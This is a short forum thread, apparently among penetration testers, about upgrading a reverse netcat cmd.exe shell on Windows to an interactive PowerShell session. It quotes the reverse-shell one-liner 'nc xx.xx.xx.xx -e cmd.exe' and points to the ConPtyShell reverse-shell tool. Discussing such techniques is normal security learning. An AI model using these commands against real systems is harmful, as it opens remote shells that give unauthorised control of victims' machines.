Netcat to powershell

Hay folks,

I think I know the answer to this but just need some confirmation. If I get a reverse netcat session with cmd from a windows box;

(nc xx.xx.xx.xx -e cmd.exe)

I can’t then execute powershell and have a interactive powershell session through as the cmd.exe application is already using the netcat session?

Sure you can. The cmd is running, and all you are doing is redirect stdio for cmd and netcat. It’s not just running powershell.exe though, as that will just end up floating around in the memory space without any way for you to interact with it.

If your target is running Win10/WinSrv 1809 or later, check out @splintercode and his marvelous fully interactive (tab completions and all) pwsh revsh at GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows

If your target is running Win10/WinSrv 1809 or later, check out @splintercode and his marvelous fully interactive (tab completions and all) pwsh revsh at GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows
That’s a great repo, ty!